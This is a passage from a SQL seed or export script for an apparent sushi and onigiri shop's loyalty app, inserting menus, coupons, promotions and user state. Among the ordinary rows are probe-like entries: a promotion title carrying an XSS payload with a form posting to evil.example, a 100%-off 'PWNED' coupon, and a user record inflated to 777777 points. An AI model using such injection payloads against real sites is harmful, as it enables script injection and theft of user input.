($naeki$b87s56p21erem5r$naeki$, $naeki$Honey Lemon Pudding$naeki$, $naeki$drinks$naeki$, 52, $naeki$Bright finish$naeki$, $naeki$$naeki$, $naeki$assets/dessert_honey_lemon.jpg$naeki$),
($naeki$xwz44z20nztcmg6$naeki$, $naeki$Banana Choco Pudding$naeki$, $naeki$drinks$naeki$, 55, $naeki$With chocolate$naeki$, $naeki$$naeki$, $naeki$assets/dessert_banana_choco.jpg$naeki$),
($naeki$s19dx646n5pdhz9$naeki$, $naeki$Sweet Potato Pudding$naeki$, $naeki$drinks$naeki$, 59, $naeki$Japanese sweet potato$naeki$, $naeki$$naeki$, $naeki$assets/dessert_matcha_pudding.jpg$naeki$);

-- milestone -> milestone (7)
insert into milestone (id, title, text, kicker, pts, sort_order) values
($naeki$first$naeki$, $naeki$Your first order$naeki$, $naeki$Welcome in — a one-time bonus.$naeki$, $naeki$First bite$naeki$, 50, 1),
($naeki$breadth$naeki$, $naeki$Try all six categories$naeki$, $naeki$Rewarded for breadth.$naeki$, $naeki$Full-menu tour$naeki$, 100, 2),
($naeki$cadence$naeki$, $naeki$Order on 7 different days$naeki$, $naeki$Showing up is the habit.$naeki$, $naeki$Weekly regular$naeki$, 150, 3),
($naeki$party$naeki$, $naeki$One order of ฿500+$naeki$, $naeki$The tray run for the team.$naeki$, $naeki$Office hero$naeki$, 100, 4),
($naeki$week$naeki$, $naeki$Order 3× in one calendar week$naeki$, $naeki$A stretch goal past your cadence.$naeki$, $naeki$This week$naeki$, 100, 5),
($naeki$friend$naeki$, $naeki$Redeem a friend's referral$naeki$, $naeki$When a shared code lands, both sides earn.$naeki$, $naeki$Give + get$naeki$, 100, 6),
($naeki$lifetime$naeki$, $naeki$Spend ฿1,000 lifetime$naeki$, $naeki$Cross the ฿1,000 mark.$naeki$, $naeki$Loyal wallet$naeki$, 200, 7);

-- coupon -> coupon (7)
insert into coupon (id, code, title, type, brand, branch_id, value, min_spend, usage_limit, used_count, free_item, description, active, starts_at_ms, starts_at, expires_at_ms, expires_at) values
($naeki$7zxkrqlrqrmlpjn$naeki$, $naeki$NAEKI10$naeki$, $naeki$10% off your tray$naeki$, $naeki$percent$naeki$, $naeki$$naeki$, $naeki$$naeki$, 10, 300, 1000, 0, $naeki$$naeki$, $naeki$10% off any order over ฿300.$naeki$, true, 1789379199875, $naeki$2026-09-14T09:46:39.875Z$naeki$, 1797155199875, $naeki$2026-12-13T09:46:39.875Z$naeki$),
($naeki$8o2dkx0oc9f2gd8$naeki$, $naeki$MATCHA50$naeki$, $naeki$Free iced matcha$naeki$, $naeki$free_item$naeki$, $naeki$go$naeki$, $naeki$$naeki$, 0, 0, 500, 0, $naeki$Iced Matcha$naeki$, $naeki$Free iced matcha with any onigiri.$naeki$, true, 1789379199875, $naeki$2026-09-14T09:46:39.875Z$naeki$, 1797155199875, $naeki$2026-12-13T09:46:39.875Z$naeki$),
($naeki$o88e0r0als6v1a1$naeki$, $naeki$FRIDAY20$naeki$, $naeki$Party set upgrade$naeki$, $naeki$percent$naeki$, $naeki$sushi$naeki$, $naeki$$naeki$, 20, 599, 200, 0, $naeki$$naeki$, $naeki$20% off party sets over ฿599.$naeki$, true, 1789379199875, $naeki$2026-09-14T09:46:39.875Z$naeki$, 1797155199875, $naeki$2026-12-13T09:46:39.875Z$naeki$),
($naeki$yqevm7hz06n0lfg$naeki$, $naeki$WELCOME$naeki$, $naeki$Welcome bonus$naeki$, $naeki$fixed_baht$naeki$, $naeki$$naeki$, $naeki$$naeki$, 50, 200, 2000, 0, $naeki$$naeki$, $naeki$฿50 off your first order.$naeki$, true, 1789379199875, $naeki$2026-09-14T09:46:39.875Z$naeki$, 1797155199875, $naeki$2026-12-13T09:46:39.875Z$naeki$),
($naeki$dhp8oe8v1key3vi$naeki$, $naeki$OFFICE250$naeki$, $naeki$Office tray ฿250 off$naeki$, $naeki$fixed_baht$naeki$, $naeki$sushi$naeki$, $naeki$$naeki$, 250, 600, 100, 0, $naeki$$naeki$, $naeki$฿250 off Assorted Sushi Set (minimum order$naeki$, true, 1789379199875, $naeki$2026-09-14T09:46:39.875Z$naeki$, 1797155199875, $naeki$2026-12-13T09:46:39.875Z$naeki$),
($naeki$3xv8jekfsxds3gj$naeki$, $naeki$ASOK5$naeki$, $naeki$BTS Asok ฿5 off$naeki$, $naeki$fixed_baht$naeki$, $naeki$go$naeki$, $naeki$Naeki Go @ BTS Asok$naeki$, 5, 0, 9999, 0, $naeki$$naeki$, $naeki$฿5 off any onigiri at BTS Asok.$naeki$, true, 1789379199875, $naeki$2026-09-14T09:46:39.875Z$naeki$, 1791971199875, $naeki$2026-10-14T09:46:39.875Z$naeki$),
($naeki$gn7d0ynu432grk0$naeki$, $naeki$PWNED$naeki$, $naeki$Free everything$naeki$, $naeki$percent$naeki$, $naeki$$naeki$, $naeki$$naeki$, 100, 0, 99999, 0, $naeki$$naeki$, $naeki$$naeki$, true, 0, null, 0, null);

-- promotion -> promotion (5)
insert into promotion (id, title, body, type, status, branch, author, approver, coupon_code, cta_label, cta_url, review_note, send_count, sent_at_ms, sent_at, created_ms, created, reviewed_at_ms, reviewed_at, when_note) values
($naeki$jx1wme1d678frhq$naeki$, $naeki$Free iced matcha with any onigiri$naeki$, $naeki$This Friday 11:30–14:00 at BTS Asok.$naeki$, $naeki$offer$naeki$, $naeki$approved$naeki$, $naeki$Naeki Go! @ BTS Asok$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$Order on LINE$naeki$, $naeki$https://lin.ee/DqJnedo$naeki$, $naeki$$naeki$, 0, 0, null, 1789206472812, $naeki$2026-09-12T09:47:52.812Z$naeki$, 1789379363246.8777, $naeki$2026-09-14T09:49:23.246Z$naeki$, $naeki$Fri 11:30–14:00$naeki$),
($naeki$nytcyxcbl5efyql$naeki$, $naeki$2× points this Thursday$naeki$, $naeki$Double points on every order at the Siam counter.$naeki$, $naeki$offer$naeki$, $naeki$approved$naeki$, $naeki$Naeki Sushi @ BTS Siam$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$See rewards$naeki$, $naeki$$naeki$, $naeki$Looks good.$naeki$, 0, 0, null, 1789292872840, $naeki$2026-09-13T09:47:52.840Z$naeki$, 1789336072840, $naeki$2026-09-13T21:47:52.840Z$naeki$, $naeki$$naeki$),
($naeki$3gp133c218clh5f$naeki$, $naeki$Test event promo$naeki$, $naeki$Free sample this Friday at Asok.$naeki$, $naeki$offer$naeki$, $naeki$approved$naeki$, $naeki$Naeki Go! @ BTS Asok$naeki$, $naeki$zp0kpb2kk5yd2vh$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$$naeki$, 0, 0, null, 1789382311195, $naeki$2026-09-14T10:38:31.195Z$naeki$, 0, null, $naeki$$naeki$),
($naeki$yyobfu6q4ixkj7t$naeki$, $naeki$Free onigiri with any purchase of two beverages!$naeki$, $naeki$Total savings of up to 60 THB!$naeki$, $naeki$offer$naeki$, $naeki$approved$naeki$, $naeki$Naeki Sushi @ BTS Siam$naeki$, $naeki$aq5qfrq4t0tbym4$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$ORDER NOW$naeki$, $naeki$$naeki$, $naeki$$naeki$, 0, 0, null, 1789383278892, $naeki$2026-09-14T10:54:38.892Z$naeki$, 0, null, $naeki$$naeki$),
($naeki$bpmli7n4687j2cf$naeki$, $naeki$<img src=x onerror=alert(1)> <form action=https://evil.example><input name=p>$naeki$, $naeki$<b>bold body</b>$naeki$, $naeki$offer$naeki$, $naeki$pending$naeki$, $naeki$Naeki Go! @ BTS Asok$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$$naeki$, $naeki$$naeki$, 0, 0, null, 1789490877585, $naeki$2026-09-15T16:47:57.585Z$naeki$, 0, null, $naeki$$naeki$);

-- notify_request -> notify_request (1)
insert into notify_request (id, title, body, type, audience, branch, status, author, cta_label, cta_url, created_ms, created, when_note) values
($naeki$m0maj3sk4z0z4n8$naeki$, $naeki$Free matcha with any onigiri this Friday$naeki$, $naeki$Order any onigiri and get a free iced matcha, Fri 11:30–14:00 at BTS Asok.$naeki$, $naeki$offer$naeki$, $naeki$everyone$naeki$, $naeki$Naeki Go! @ BTS Asok$naeki$, $naeki$approved$naeki$, $naeki$lvyjho8tlj3dn0s$naeki$, $naeki$Order on LINE$naeki$, $naeki$https://lin.ee/DqJnedo$naeki$, 1789375408755, $naeki$2026-09-14T08:43:28.755Z$naeki$, $naeki$Fri 11:30–14:00$naeki$);

-- loyalty -> loyalty (1)
insert into loyalty (id, owner, points, lifetime, history) values
($naeki$s8h7zqaywwyd2zp$naeki$, $naeki$lvyjho8tlj3dn0s$naeki$, 211, 211, $naeki$[{"category":"onigiri","count":1,"couponCode":null,"lines":[{"name":"Roasted Salmon","price":45,"qty":1}],"total":45,"ts":1789383083074},{"category":"onigiri","count":2,"couponCode":null,"lines":[{"name":"Roasted Salmon","price":45,"qty":2}],"total":90,"ts":1789382499278},{"category":"onigiri","count":7,"couponCode":null,"lines":[{"name":"Roasted Salmon","price":45,"qty":7}],"total":315,"ts":1789382373959},{"category":"nigiri","count":6,"couponCode":"WELCOME","lines":[{"name":"Salmon Nigiri","price":45,"qty":4},{"name":"Tuna Mayo Onigiri","price":35,"qty":2}],"total":200,"ts":1789379866916},{"category":"nigiri","count":6,"couponCode":"WELCOME","lines":[{"name":"Salmon Nigiri","price":45,"qty":4},{"name":"Tuna Mayo Onigiri","price":35,"qty":2}],"total":200,"ts":1789379769378}]$naeki$::jsonb);

-- user_state -> user_state (3)
insert into user_state (id, owner, data) values
($naeki$1r6ahp0mhjunp2r$naeki$, $naeki$lvyjho8tlj3dn0s$naeki$, $naeki${"loyalty":{"lifetime":777777,"points":777777}}$naeki$::jsonb),
($naeki$3jqsbztidl0mlcx$naeki$, $naeki$zp0kpb2kk5yd2vh$naeki$, $naeki${"card":{"redemptions":[],"size":10,"stamps":[{"note":"pb test stamp","ts":1700000000001}]},"cart":[{"addedAt":1789382176106,"name":"Roasted Salmon","price":45,"qty":1}],"chat":{"connected":false,"thread":[]},"claimed":[],"coupon":null,"franchiseDrafts":[],"gifts":[],"loyalty":{"history":[{"category":"nigiri","count":6,"couponCode":"WELCOME","lines":[{"name":"Salmon Nigiri","price":45,"qty":4},{"name":"Tuna Mayo Onigiri","price":35,"qty":2}],"total":200,"ts":1789379866916},{"category":"nigiri","count":6,"couponCode":"WELCOME","lines":[{"name":"Salmon Nigiri","price":45,"qty":4},{"name":"Tuna Mayo Onigiri","price":35,"qty":2}],"total":200,"ts":1789379769378}],"lifetime":164,"points":164},"offerAcks":{"mon|deal|Test":{"ts":1700000000000,"via":"popup"}},"publishedOffers":[],"redeemedRefs":[],"referralCodes":[],"referralsRedeemed":0,"subscribedBranches":[],"wallet":{"balance":300,"expressPay":null,"topups":[{"amount":300,"method":"TrueMoney","ref":"TR-UIU8HO","ts":1789382175784}],"useWallet":true}}$naeki$::jsonb),
($naeki$gd9ytu5gj0lh018$naeki$, $naeki$aq5qfrq4t0tbym4$naeki$, $naeki${"card":{"redemptions":[],"size":10,"stamps":[{"note":"pb test stamp","ts":1700000000001}]},"cart":[{"addedAt":1789382176106,"name":"Roasted Salmon","price":45,"qty":1}],"chat":{"connected":false,"thread":[]},"claimed":[],"coupon":null,"franchiseDrafts":[],"gifts":[],"loyalty":{"history":[{"category":"nigiri","count":6,"couponCode":"WELCOME","lines":[{"name":"Salmon Nigiri","price":45,"qty":4},{"name":"Tuna Mayo Onigiri","price":35,"qty":2}],"total":200,"ts":1789379866916},{"category":"nigiri","count":6,"couponCode":"WELCOME","lines":[{"name":"Salmon Nigiri","price":45,"qty":4},{"name":"Tuna Mayo Onigiri","price":35,"qty":2}],"total":200,"ts":1789379769378}],"lifetime":164,"points":114},"offerAcks":{"1|Monday set|Onigiri + Iced Matcha 89฿":{"ts":1789383375820,"via":"inbox"},"any|Because you order it|2× points on Nigiri Sushi":{"ts":1789383376767,"via":"inbox"},"mon|deal|Test":{"ts":1700000000000,"via":"popup"}},"publishedOffers":[],"redeemedRefs":[],"referralCodes":[],"referralsRedeemed":0,"subscribedBranches":[],"wallet":{"balance":350,"expressPay":null,"topups":[{"amount":300,"method":"TrueMoney","ref":"TR-UIU8HO","ts":1789382175784}],"useWallet":true}}$naeki$::jsonb);
commit;

-- row counts: {"users":10,"branch":22,"menu_item":77,"milestone":7,"coupon":7,"promotion":5,"notify_request":1,"franchise_draft":0,"loyalty":1,"user_state":3}
